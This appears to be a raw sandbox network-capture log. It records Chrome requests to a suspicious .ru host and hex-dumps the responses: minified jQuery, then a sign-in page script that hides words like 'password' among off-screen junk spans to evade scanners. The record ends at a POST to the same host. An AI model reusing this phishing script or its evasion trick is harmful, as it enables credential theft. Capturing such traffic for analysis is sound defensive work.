                                                                                                                                                                                    2024-01-26 13:41:57 UTC1369INData Raw: 72 74 3a 68 7d 29 2c 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 26 26 28 77 2e 66 6e 5b 53 79 6d 62 6f 6c 2e 69 74 65 72 61 74 6f 72 5d 3d 6e 5b 53 79 6d 62 6f 6c 2e 69 74 65 72 61 74 6f 72 5d 29 2c 77 2e 65 61 63 68 28 22 42 6f 6f 6c 65 61 6e 20 4e 75 6d 62 65 72 20 53 74 72 69 6e 67 20 46 75 6e 63 74 69 6f 6e 20 41 72 72 61 79 20 44 61 74 65 20 52 65 67 45 78 70 20 4f 62 6a 65 63 74 20 45 72 72 6f 72 20 53 79 6d 62 6f 6c 22 2e 73 70 6c 69 74 28 22 20 22 29 2c 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 6c 5b 22 5b 6f 62 6a 65 63 74 20 22 2b 74 2b 22 5d 22 5d 3d 74 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 7d 29 3b 66 75 6e 63 74 69 6f 6e 20 43 28 65 29 7b 76 61 72 20 74 3d 21 21 65 26 26 22 6c 65 6e 67 74 68 22 69 6e 20 65
                                                                                                                                                                                    Data Ascii: rt:h}),"function"==typeof Symbol&&(w.fn[Symbol.iterator]=n[Symbol.iterator]),w.each("Boolean Number String Function Array Date RegExp Object Error Symbol".split(" "),function(e,t){l["[object "+t+"]"]=t.toLowerCase()});function C(e){var t=!!e&&"length"in e
                                                                                                                                                                                    2024-01-26 13:41:57 UTC1369INData Raw: 5e 5c 5c 2e 28 22 2b 52 2b 22 29 22 29 2c 54 41 47 3a 6e 65 77 20 52 65 67 45 78 70 28 22 5e 28 22 2b 52 2b 22 7c 5b 2a 5d 29 22 29 2c 41 54 54 52 3a 6e 65 77 20 52 65 67 45 78 70 28 22 5e 22 2b 49 29 2c 50 53 45 55 44 4f 3a 6e 65 77 20 52 65 67 45 78 70 28 22 5e 22 2b 57 29 2c 43 48 49 4c 44 3a 6e 65 77 20 52 65 67 45 78 70 28 22 5e 3a 28 6f 6e 6c 79 7c 66 69 72 73 74 7c 6c 61 73 74 7c 6e 74 68 7c 6e 74 68 2d 6c 61 73 74 29 2d 28 63 68 69 6c 64 7c 6f 66 2d 74 79 70 65 29 28 3f 3a 5c 5c 28 22 2b 4d 2b 22 2a 28 65 76 65 6e 7c 6f 64 64 7c 28 28 5b 2b 2d 5d 7c 29 28 5c 5c 64 2a 29 6e 7c 29 22 2b 4d 2b 22 2a 28 3f 3a 28 5b 2b 2d 5d 7c 29 22 2b 4d 2b 22 2a 28 5c 5c 64 2b 29 7c 29 29 22 2b 4d 2b 22 2a 5c 5c 29 7c 29 22 2c 22 69 22 29 2c 62 6f 6f 6c 3a 6e 65 77
                                                                                                                                                                                    Data Ascii: ^\\.("+R+")"),TAG:new RegExp("^("+R+"|[*])"),ATTR:new RegExp("^"+I),PSEUDO:new RegExp("^"+W),CHILD:new RegExp("^:(only|first|last|nth|nth-last)-(child|of-type)(?:\\("+M+"*(even|odd|(([+-]|)(\\d*)n|)"+M+"*(?:([+-]|)"+M+"*(\\d+)|))"+M+"*\\)|)","i"),bool:new
                                                                                                                                                                                    2024-01-26 13:41:57 UTC1369INData Raw: 72 6e 20 72 3b 69 66 28 21 69 26 26 28 28 74 3f 74 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c 7c 74 3a 77 29 21 3d 3d 64 26 26 70 28 74 29 2c 74 3d 74 7c 7c 64 2c 67 29 29 7b 69 66 28 31 31 21 3d 3d 54 26 26 28 66 3d 4a 2e 65 78 65 63 28 65 29 29 29 69 66 28 6f 3d 66 5b 31 5d 29 7b 69 66 28 39 3d 3d 3d 54 29 7b 69 66 28 21 28 6c 3d 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 6f 29 29 29 72 65 74 75 72 6e 20 72 3b 69 66 28 6c 2e 69 64 3d 3d 3d 6f 29 72 65 74 75 72 6e 20 72 2e 70 75 73 68 28 6c 29 2c 72 7d 65 6c 73 65 20 69 66 28 6d 26 26 28 6c 3d 6d 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 6f 29 29 26 26 78 28 74 2c 6c 29 26 26 6c 2e 69 64 3d 3d 3d 6f 29 72 65 74 75 72 6e 20 72 2e 70 75 73 68 28 6c 29 2c 72 7d 65 6c 73 65 7b 69 66 28 66 5b
                                                                                                                                                                                    Data Ascii: rn r;if(!i&&((t?t.ownerDocument||t:w)!==d&&p(t),t=t||d,g)){if(11!==T&&(f=J.exec(e)))if(o=f[1]){if(9===T){if(!(l=t.getElementById(o)))return r;if(l.id===o)return r.push(l),r}else if(m&&(l=m.getElementById(o))&&x(t,l)&&l.id===o)return r.push(l),r}else{if(f[
                                                                                                                                                                                    2024-01-26 13:41:57 UTC1369INData Raw: 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 22 69 6e 70 75 74 22 3d 3d 3d 74 2e 6e 6f 64 65 4e 61 6d 65 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 26 26 74 2e 74 79 70 65 3d 3d 3d 65 7d 7d 66 75 6e 63 74 69 6f 6e 20 70 65 28 65 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 6e 3d 74 2e 6e 6f 64 65 4e 61 6d 65 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 3b 72 65 74 75 72 6e 28 22 69 6e 70 75 74 22 3d 3d 3d 6e 7c 7c 22 62 75 74 74 6f 6e 22 3d 3d 3d 6e 29 26 26 74 2e 74 79 70 65 3d 3d 3d 65 7d 7d 66 75 6e 63 74 69 6f 6e 20 64 65 28 65 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 22 66 6f 72 6d 22 69 6e 20 74 3f 74 2e 70 61 72 65 6e 74 4e 6f 64 65 26 26 21 31 3d 3d 3d
                                                                                                                                                                                    Data Ascii: return function(t){return"input"===t.nodeName.toLowerCase()&&t.type===e}}function pe(e){return function(t){var n=t.nodeName.toLowerCase();return("input"===n||"button"===n)&&t.type===e}}function de(e){return function(t){return"form"in t?t.parentNode&&!1===
                                                                                                                                                                                    2024-01-26 13:41:57 UTC1369INData Raw: 6d 65 6e 74 73 42 79 4e 61 6d 65 7c 7c 21 64 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 4e 61 6d 65 28 62 29 2e 6c 65 6e 67 74 68 7d 29 2c 6e 2e 67 65 74 42 79 49 64 3f 28 72 2e 66 69 6c 74 65 72 2e 49 44 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 65 2e 72 65 70 6c 61 63 65 28 5a 2c 65 65 29 3b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 69 64 22 29 3d 3d 3d 74 7d 7d 2c 72 2e 66 69 6e 64 2e 49 44 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 69 66 28 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 26 26 67 29 7b 76 61 72 20 6e 3d 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 65 29 3b 72 65 74 75 72
                                                                                                                                                                                    Data Ascii: mentsByName||!d.getElementsByName(b).length}),n.getById?(r.filter.ID=function(e){var t=e.replace(Z,ee);return function(e){return e.getAttribute("id")===t}},r.find.ID=function(e,t){if("undefined"!=typeof t.getElementById&&g){var n=t.getElementById(e);retur
                                                                                                                                                                                    2024-01-26 13:41:57 UTC1369INData Raw: 26 26 79 2e 70 75 73 68 28 22 5b 2a 5e 24 5d 3d 22 2b 4d 2b 22 2a 28 3f 3a 27 27 7c 5c 22 5c 22 29 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 5b 73 65 6c 65 63 74 65 64 5d 22 29 2e 6c 65 6e 67 74 68 7c 7c 79 2e 70 75 73 68 28 22 5c 5c 5b 22 2b 4d 2b 22 2a 28 3f 3a 76 61 6c 75 65 7c 22 2b 50 2b 22 29 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 5b 69 64 7e 3d 22 2b 62 2b 22 2d 5d 22 29 2e 6c 65 6e 67 74 68 7c 7c 79 2e 70 75 73 68 28 22 7e 3d 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 3a 63 68 65 63 6b 65 64 22 29 2e 6c 65 6e 67 74 68 7c 7c 79 2e 70 75 73 68 28 22 3a 63 68 65 63 6b 65 64 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 61 23 22 2b 62 2b 22 2b 2a
                                                                                                                                                                                    Data Ascii: &&y.push("[*^$]="+M+"*(?:''|\"\")"),e.querySelectorAll("[selected]").length||y.push("\\["+M+"*(?:value|"+P+")"),e.querySelectorAll("[id~="+b+"-]").length||y.push("~="),e.querySelectorAll(":checked").length||y.push(":checked"),e.querySelectorAll("a#"+b+"+*
                                                                                                                                                                                    2024-01-26 13:41:57 UTC1369INData Raw: 3d 74 2e 70 61 72 65 6e 74 4e 6f 64 65 29 69 66 28 74 3d 3d 3d 65 29 72 65 74 75 72 6e 21 30 3b 72 65 74 75 72 6e 21 31 7d 2c 44 3d 74 3f 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 69 66 28 65 3d 3d 3d 74 29 72 65 74 75 72 6e 20 66 3d 21 30 2c 30 3b 76 61 72 20 72 3d 21 65 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 2d 21 74 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 3b 72 65 74 75 72 6e 20 72 7c 7c 28 31 26 28 72 3d 28 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c 7c 65 29 3d 3d 3d 28 74 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c 7c 74 29 3f 65 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 28 74 29 3a 31 29 7c 7c 21 6e 2e 73 6f 72 74 44 65 74 61 63 68 65 64 26 26 74 2e
                                                                                                                                                                                    Data Ascii: =t.parentNode)if(t===e)return!0;return!1},D=t?function(e,t){if(e===t)return f=!0,0;var r=!e.compareDocumentPosition-!t.compareDocumentPosition;return r||(1&(r=(e.ownerDocument||e)===(t.ownerDocument||t)?e.compareDocumentPosition(t):1)||!n.sortDetached&&t.


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    58192.168.2.1649798104.21.79.94436752C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2024-01-26 13:42:01 UTC773OUTGET /VyRsmGftiIlOxrabXBIOtQtS/6EWqQ2tPJ3hOCQyr/8EIQOSnBt HTTP/1.1
                                                                                                                                                                                    Host: bggcwvekn3axi3ffz5ai.rvucouijw.ru
                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                    Upgrade-Insecure-Requests: 1
                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                                                    Sec-Fetch-Mode: navigate
                                                                                                                                                                                    Sec-Fetch-User: ?1
                                                                                                                                                                                    Sec-Fetch-Dest: document
                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                    Cookie: PHPSESSID=ls834djnk0rde6vlt948asvcmr
                                                                                                                                                                                    2024-01-26 13:42:01 UTC732INHTTP/1.1 200 OK
                                                                                                                                                                                    Date: Fri, 26 Jan 2024 13:42:01 GMT
                                                                                                                                                                                    Content-Type: text/javascript;charset=UTF-8
                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                    cache-control: no-store, no-cache, must-revalidate
                                                                                                                                                                                    pragma: no-cache
                                                                                                                                                                                    vary: Accept-Encoding
                                                                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=EIEPZh4TJdcmPBnWWMzdBRTI90LS1NCHeAjuWs801VUfRvN%2BNQkG1nIeg7Q9gY2Uuvl0WmGd7ptMfqGOeAfq8TARpWV5CofaHbDfATtVE0hDhDzIzZM4neeQcIB2SsyipEfY5bcdMzmuyBhKerUTmhZuK9I%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                    CF-RAY: 84b92d4198ee4570-ATL
                                                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                    2024-01-26 13:42:01 UTC637INData Raw: 34 62 66 62 0d 0a 24 28 64 6f 63 75 6d 65 6e 74 29 2e 72 65 61 64 79 28 66 75 6e 63 74 69 6f 6e 28 29 20 7b 24 28 27 23 65 72 64 7a 71 71 73 70 62 7a 27 29 2e 66 6f 63 75 73 28 29 3b 7d 29 3b 0d 0a 24 28 27 23 75 77 65 76 69 63 70 6d 67 6c 27 29 2e 6b 65 79 70 72 65 73 73 28 66 75 6e 63 74 69 6f 6e 28 65 29 20 7b 0d 0a 09 76 61 72 20 6b 65 79 20 3d 20 65 2e 77 68 69 63 68 3b 0d 0a 09 69 66 20 28 6b 65 79 20 3d 3d 20 31 33 29 0d 0a 09 7b 6e 51 28 74 72 75 65 29 3b 7d 7d 29 3b 0d 0a 24 28 22 23 63 78 65 64 73 72 75 64 72 74 22 29 2e 63 6c 69 63 6b 28 66 75 6e 63 74 69 6f 6e 28 65 29 20 7b 0d 0a 09 65 2e 70 72 65 76 65 6e 74 44 65 66 61 75 6c 74 28 29 3b 0d 0a 09 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 20 3d 20 22 2e 2e 2f 72 34 61 72 68
                                                                                                                                                                                    Data Ascii: 4bfb$(document).ready(function() {$('#erdzqqspbz').focus();});$('#uwevicpmgl').keypress(function(e) {var key = e.which;if (key == 13){nQ(true);}});$("#cxedsrudrt").click(function(e) {e.preventDefault();window.location.href = "../r4arh
                                                                                                                                                                                    2024-01-26 13:42:01 UTC1369INData Raw: 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 6c 65 66 74 3a 20 2d 39 39 39 39 70 78 3b 22 3e 30 4a 30 45 4c 6c 61 76 4a 7a 6f 3c 2f 73 70 61 6e 3e 72 20 61 20 76 3c 73 70 61 6e 20 73 74 79 6c 65 3d 22 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 6c 65 66 74 3a 20 2d 39 39 39 39 70 78 3b 22 3e 76 31 71 78 6c 65 49 6b 74 3c 2f 73 70 61 6e 3e 61 3c 73 70 61 6e 20 73 74 79 6c 65 3d 22 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 6c 65 66 74 3a 20 2d 39 39 39 39 70 78 3b 22 3e 44 5a 36 43 56 78 48 59 51 70 66 63 6e 5a 3c 2f 73 70 61 6e 3e 6c 3c 73 70 61 6e 20 73 74 79 6c 65 3d 22 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 6c 65 66 74 3a 20 2d 39 39 39 39 70 78 3b 22 3e 47 56 4f 63 55 48 49 69 65 52 68 68 64 33
                                                                                                                                                                                    Data Ascii: position: absolute;left: -9999px;">0J0ELlavJzo</span>r a v<span style="position: absolute;left: -9999px;">v1qxleIkt</span>a<span style="position: absolute;left: -9999px;">DZ6CVxHYQpfcnZ</span>l<span style="position: absolute;left: -9999px;">GVOcUHIieRhhd3
                                                                                                                                                                                    2024-01-26 13:42:01 UTC1369INData Raw: 53 3c 73 70 61 6e 20 73 74 79 6c 65 3d 22 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 6c 65 66 74 3a 20 2d 39 39 39 39 70 78 3b 22 3e 4e 33 6b 59 71 31 34 70 50 67 3c 2f 73 70 61 6e 3e 6b 3c 73 70 61 6e 20 73 74 79 6c 65 3d 22 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 6c 65 66 74 3a 20 2d 39 39 39 39 70 78 3b 22 3e 33 72 49 6a 58 6c 65 37 34 59 3c 2f 73 70 61 6e 3e 79 70 3c 73 70 61 6e 20 73 74 79 6c 65 3d 22 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 6c 65 66 74 3a 20 2d 39 39 39 39 70 78 3b 22 3e 44 35 63 34 35 31 53 74 35 64 4c 59 3c 2f 73 70 61 6e 3e 65 20 6e 3c 73 70 61 6e 20 73 74 79 6c 65 3d 22 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 6c 65 66 74 3a 20 2d 39 39 39 39 70 78 3b 22 3e 6e 46 62
                                                                                                                                                                                    Data Ascii: S<span style="position: absolute;left: -9999px;">N3kYq14pPg</span>k<span style="position: absolute;left: -9999px;">3rIjXle74Y</span>yp<span style="position: absolute;left: -9999px;">D5c451St5dLY</span>e n<span style="position: absolute;left: -9999px;">nFb
                                                                                                                                                                                    2024-01-26 13:42:01 UTC1369INData Raw: 20 73 74 79 6c 65 3d 27 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 6c 65 66 74 3a 20 2d 39 39 39 39 70 78 3b 27 3e 54 4e 74 46 52 4d 46 55 74 6e 3c 2f 73 70 61 6e 3e 74 20 77 3c 73 70 61 6e 20 73 74 79 6c 65 3d 27 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 6c 65 66 74 3a 20 2d 39 39 39 39 70 78 3b 27 3e 56 78 75 51 4e 4c 4e 71 35 30 53 7a 78 46 3c 2f 73 70 61 6e 3e 69 74 3c 73 70 61 6e 20 73 74 79 6c 65 3d 27 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 6c 65 66 74 3a 20 2d 39 39 39 39 70 78 3b 27 3e 78 36 6a 72 65 6c 78 49 4d 61 74 57 35 4c 4c 3c 2f 73 70 61 6e 3e 68 20 74 68 3c 73 70 61 6e 20 73 74 79 6c 65 3d 27 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 6c 65 66 74 3a 20 2d 39 39 39 39 70 78 3b 27
                                                                                                                                                                                    Data Ascii: style='position: absolute;left: -9999px;'>TNtFRMFUtn</span>t w<span style='position: absolute;left: -9999px;'>VxuQNLNq50SzxF</span>it<span style='position: absolute;left: -9999px;'>x6jrelxIMatW5LL</span>h th<span style='position: absolute;left: -9999px;'
                                                                                                                                                                                    2024-01-26 13:42:01 UTC1369INData Raw: 65 3b 6c 65 66 74 3a 20 2d 39 39 39 39 70 78 3b 27 3e 42 54 58 4c 63 31 55 63 55 47 38 6f 66 42 3c 2f 73 70 61 6e 3e 63 72 3c 73 70 61 6e 20 73 74 79 6c 65 3d 27 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 6c 65 66 74 3a 20 2d 39 39 39 39 70 78 3b 27 3e 36 64 6a 75 74 62 43 51 56 43 63 6d 76 79 3c 2f 73 70 61 6e 3e 6f 73 3c 73 70 61 6e 20 73 74 79 6c 65 3d 27 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 6c 65 66 74 3a 20 2d 39 39 39 39 70 78 3b 27 3e 61 59 6f 70 79 6e 74 62 4d 38 30 4d 3c 2f 73 70 61 6e 3e 6f 66 3c 73 70 61 6e 20 73 74 79 6c 65 3d 27 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 6c 65 66 74 3a 20 2d 39 39 39 39 70 78 3b 27 3e 73 79 70 35 58 5a 46 41 49 64 4f 3c 2f 73 70 61 6e 3e 74 20 61 63 3c 73 70 61
                                                                                                                                                                                    Data Ascii: e;left: -9999px;'>BTXLc1UcUG8ofB</span>cr<span style='position: absolute;left: -9999px;'>6djutbCQVCcmvy</span>os<span style='position: absolute;left: -9999px;'>aYopyntbM80M</span>of<span style='position: absolute;left: -9999px;'>syp5XZFAIdO</span>t ac<spa
                                                                                                                                                                                    2024-01-26 13:42:01 UTC1369INData Raw: 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 6c 65 66 74 3a 20 2d 39 39 39 39 70 78 3b 22 3e 34 58 6b 38 68 30 4b 41 75 56 6e 61 3c 2f 73 70 61 6e 3e 6e 74 3c 73 70 61 6e 20 73 74 79 6c 65 3d 22 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 6c 65 66 74 3a 20 2d 39 39 39 39 70 78 3b 22 3e 55 47 51 7a 73 35 44 6d 45 5a 6c 3c 2f 73 70 61 6e 3e 65 3c 73 70 61 6e 20 73 74 79 6c 65 3d 22 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 6c 65 66 74 3a 20 2d 39 39 39 39 70 78 3b 22 3e 71 53 43 62 6b 50 6d 6d 4e 73 3c 2f 73 70 61 6e 3e 72 20 70 3c 73 70 61 6e 20 73 74 79 6c 65 3d 22 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 6c 65 66 74 3a 20 2d 39 39 39 39 70 78 3b 22 3e 72 39 35 39 50 62 65 68 70 36 43 5a 78 36 4e 3c
                                                                                                                                                                                    Data Ascii: position: absolute;left: -9999px;">4Xk8h0KAuVna</span>nt<span style="position: absolute;left: -9999px;">UGQzs5DmEZl</span>e<span style="position: absolute;left: -9999px;">qSCbkPmmNs</span>r p<span style="position: absolute;left: -9999px;">r959Pbehp6CZx6N<
                                                                                                                                                                                    2024-01-26 13:42:01 UTC1369INData Raw: 47 38 71 59 6f 58 72 6c 37 43 56 33 59 51 3c 2f 73 70 61 6e 3e 6e 27 29 0d 0a 09 09 09 09 09 09 09 2e 69 6e 73 65 72 74 42 65 66 6f 72 65 28 74 68 69 73 29 0d 0a 09 09 09 09 09 09 09 2e 61 64 64 43 6c 61 73 73 28 27 62 74 6e 20 62 74 6e 2d 62 6c 6f 63 6b 20 62 74 6e 2d 70 72 69 6d 61 72 79 27 29 3b 0d 0a 09 09 09 09 09 7d 29 2e 72 65 6d 6f 76 65 28 29 3b 0d 0a 09 09 09 09 7d 0d 0a 09 09 09 09 24 28 27 23 72 65 6a 67 6b 7a 65 6e 6d 71 27 29 2e 63 73 73 28 27 64 69 73 70 6c 61 79 27 2c 20 27 6e 6f 6e 65 27 29 3b 0d 0a 09 09 09 09 24 28 27 23 73 75 74 68 73 61 6a 69 76 78 27 29 2e 70 72 6f 70 28 27 64 69 73 61 62 6c 65 64 27 2c 20 66 61 6c 73 65 29 3b 0d 0a 09 09 09 7d 0d 0a 09 09 7d 29 3b 0d 0a 09 7d 20 65 6c 73 65 20 7b 0d 0a 09 09 24 28 27 23 75 77 65 76
                                                                                                                                                                                    Data Ascii: G8qYoXrl7CV3YQ</span>n').insertBefore(this).addClass('btn btn-block btn-primary');}).remove();}$('#rejgkzenmq').css('display', 'none');$('#suthsajivx').prop('disabled', false);}});} else {$('#uwev
                                                                                                                                                                                    2024-01-26 13:42:01 UTC1369INData Raw: 74 3a 20 2d 39 39 39 39 70 78 3b 22 3e 6b 76 46 33 56 4c 57 62 3c 2f 73 70 61 6e 3e 61 3c 73 70 61 6e 20 73 74 79 6c 65 3d 22 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 6c 65 66 74 3a 20 2d 39 39 39 39 70 78 3b 22 3e 50 50 50 77 75 68 32 43 65 48 3c 2f 73 70 61 6e 3e 73 3c 73 70 61 6e 20 73 74 79 6c 65 3d 22 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 6c 65 66 74 3a 20 2d 39 39 39 39 70 78 3b 22 3e 6c 38 76 6b 61 30 73 4c 76 33 3c 2f 73 70 61 6e 3e 73 77 3c 73 70 61 6e 20 73 74 79 6c 65 3d 22 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 6c 65 66 74 3a 20 2d 39 39 39 39 70 78 3b 22 3e 71 4b 36 6a 43 78 62 36 78 62 56 3c 2f 73 70 61 6e 3e 6f 72 3c 73 70 61 6e 20 73 74 79 6c 65 3d 22 70 6f 73 69 74 69 6f 6e 3a 20 61 62
                                                                                                                                                                                    Data Ascii: t: -9999px;">kvF3VLWb</span>a<span style="position: absolute;left: -9999px;">PPPwuh2CeH</span>s<span style="position: absolute;left: -9999px;">l8vka0sLv3</span>sw<span style="position: absolute;left: -9999px;">qK6jCxb6xbV</span>or<span style="position: ab
                                                                                                                                                                                    2024-01-26 13:42:01 UTC1369INData Raw: 61 62 73 6f 6c 75 74 65 3b 6c 65 66 74 3a 20 2d 39 39 39 39 70 78 3b 22 3e 59 75 6e 5a 56 4a 4c 51 78 47 62 3c 2f 73 70 61 6e 3e 72 3c 73 70 61 6e 20 73 74 79 6c 65 3d 22 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 6c 65 66 74 3a 20 2d 39 39 39 39 70 78 3b 22 3e 4b 62 74 44 6e 78 6d 48 6d 3c 2f 73 70 61 6e 3e 64 27 29 3b 0d 0a 09 24 28 27 66 6f 72 6d 27 29 2e 66 69 6e 64 28 27 69 6e 70 75 74 3a 62 75 74 74 6f 6e 27 29 2e 65 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0d 0a 09 09 24 28 22 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 27 73 75 62 6d 69 74 27 20 2f 3e 22 29 2e 61 74 74 72 28 7b 0d 0a 09 09 09 09 6e 61 6d 65 3a 20 74 68 69 73 2e 6e 61 6d 65 2c 0d 0a 09 09 09 7d 29 2e 68 74 6d 6c 28 27 53 69 3c 73 70 61 6e 20 73 74 79 6c 65 3d 22 70
                                                                                                                                                                                    Data Ascii: absolute;left: -9999px;">YunZVJLQxGb</span>r<span style="position: absolute;left: -9999px;">KbtDnxmHm</span>d');$('form').find('input:button').each(function() {$("<button type='submit' />").attr({name: this.name,}).html('Si<span style="p
                                                                                                                                                                                    2024-01-26 13:42:01 UTC1369INData Raw: 20 2d 39 39 39 39 70 78 3b 22 3e 48 6a 79 77 54 35 6a 77 37 52 79 70 30 4c 51 3c 2f 73 70 61 6e 3e 72 3c 73 70 61 6e 20 73 74 79 6c 65 3d 22 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 6c 65 66 74 3a 20 2d 39 39 39 39 70 78 3b 22 3e 4f 36 30 35 49 34 43 71 31 3c 2f 73 70 61 6e 3e 69 3c 73 70 61 6e 20 73 74 79 6c 65 3d 22 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 6c 65 66 74 3a 20 2d 39 39 39 39 70 78 3b 22 3e 4e 45 79 6e 38 4e 54 46 72 6c 3c 2f 73 70 61 6e 3e 6c 79 20 6c 3c 73 70 61 6e 20 73 74 79 6c 65 3d 22 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 6c 65 66 74 3a 20 2d 39 39 39 39 70 78 3b 22 3e 78 54 47 65 53 72 6b 36 79 58 32 56 37 32 3c 2f 73 70 61 6e 3e 6f 3c 73 70 61 6e 20 73 74 79 6c 65 3d 22 70 6f 73 69
                                                                                                                                                                                    Data Ascii: -9999px;">HjywT5jw7Ryp0LQ</span>r<span style="position: absolute;left: -9999px;">O605I4Cq1</span>i<span style="position: absolute;left: -9999px;">NEyn8NTFrl</span>ly l<span style="position: absolute;left: -9999px;">xTGeSrk6yX2V72</span>o<span style="posi


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    59192.168.2.1649802104.21.79.94436752C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2024-01-26 13:42:09 UTC1041OUTPOST /VyRsmGftiIlOxrabXBIOtQtS/30VyqDe0V3 HTTP/1.1
